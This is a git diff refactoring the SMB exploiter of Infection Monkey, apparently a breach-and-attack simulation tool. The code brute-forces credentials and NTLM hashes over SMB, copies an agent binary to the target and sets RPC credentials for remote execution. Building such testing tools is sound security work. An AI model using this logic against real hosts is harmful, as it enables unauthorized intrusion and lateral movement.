diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py index 0facecc9f..d4b7078af 100644 --- a/monkey/infection_monkey/exploit/smbexec.py +++ b/monkey/infection_monkey/exploit/smbexec.py @@ -1,4 +1,7 @@ +from dataclasses import dataclass from logging import getLogger +from pathlib import PurePath +from typing import Optional, Tuple from impacket.dcerpc.v5 import scmr, transport from impacket.dcerpc.v5.scmr import DCERPCSessionError @@ -21,6 +24,14 @@ from infection_monkey.utils.threading import interruptible_iter logger = getLogger(__name__) +@dataclass +class SelectedCredentials: + user: str + password: str + lm_hash: str + ntlm_hash: str + + class SMBExploiter(HostExploiter): _EXPLOITED_SERVICE = "SMB" KNOWN_PROTOCOLS = { @@ -31,51 +42,9 @@ class SMBExploiter(HostExploiter): SMB_SERVICE_NAME = "InfectionMonkey" def _exploit_host(self): - agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"]) + dest_path = get_agent_dst_path(self.host) - creds = generate_brute_force_combinations(self.options["credentials"]) - - for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt): - creds_for_log = get_credential_string([user, password, lm_hash, ntlm_hash]) - - try: - # copy the file remotely using SMB - remote_full_path = SmbTools.copy_file( - self.host, - agent_binary, - dest_path, - user, - password, - lm_hash, - ntlm_hash, - self.options["smb_download_timeout"], - ) - - if remote_full_path is not None: - logger.info( - f"Successfully logged in to {self.host.ip_addr} using SMB " - f"with {creds_for_log}" - ) - self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) - self.add_vuln_port( - "%s or %s" - % ( - SMBExploiter.KNOWN_PROTOCOLS["139/SMB"][1], - SMBExploiter.KNOWN_PROTOCOLS["445/SMB"][1], - ) - ) - self.exploit_result.exploitation_success = True - break - else: - # failed exploiting with this user/pass - self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) - - except Exception as exc: - logger.error( - f"Error while trying to copy file using SMB to {self.host.ip_addr} with " - f"{creds_for_log}:{exc}" - ) - continue + remote_full_path, creds = self._exploit(dest_path) if not self.exploit_result.exploitation_success: if self._is_interrupted(): @@ -109,11 +78,11 @@ class SMBExploiter(HostExploiter): if hasattr(rpctransport, "set_credentials"): # This method exists only for selected protocol sequences. rpctransport.set_credentials( - user, - get_plaintext(password), + creds.user, + get_plaintext(creds.password), "", - get_plaintext(lm_hash), - get_plaintext(ntlm_hash), + get_plaintext(creds.lm_hash), + get_plaintext(creds.ntlm_hash), None, ) rpctransport.set_kerberos(SMBExploiter.USE_KERBEROS) @@ -190,3 +159,50 @@ class SMBExploiter(HostExploiter): ) ) return self.exploit_result + + def _exploit(self, dest_path: PurePath) -> Tuple[Optional[str], SelectedCredentials]: + agent_binary = self.agent_binary_repository.get_agent_binary(self.host.os["type"]) + creds = generate_brute_force_combinations(self.options["credentials"]) + for user, password, lm_hash, ntlm_hash in interruptible_iter(creds, self.interrupt): + creds_for_log = get_credential_string([user, password, lm_hash, ntlm_hash]) + + try: + # copy the file remotely using SMB + remote_full_path = SmbTools.copy_file( + self.host, + agent_binary, + dest_path, + user, + password, + lm_hash, + ntlm_hash, + self.options["smb_download_timeout"], + ) + + if remote_full_path is not None: + logger.info( + f"Successfully logged in to {self.host.ip_addr} using SMB " + f"with {creds_for_log}" + ) + self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) + self.add_vuln_port( + "%s or %s" + % ( + SMBExploiter.KNOWN_PROTOCOLS["139/SMB"][1], + SMBExploiter.KNOWN_PROTOCOLS["445/SMB"][1], + ) + ) + self.exploit_result.exploitation_success = True + break + else: + # failed exploiting with this user/pass + self.report_login_attempt(False, user, password, lm_hash, ntlm_hash) + + except Exception as exc: + logger.error( + f"Error while trying to copy file using SMB to {self.host.ip_addr} with " + f"{creds_for_log}:{exc}" + ) + continue + + return remote_full_path, SelectedCredentials(user, password, lm_hash, ntlm_hash)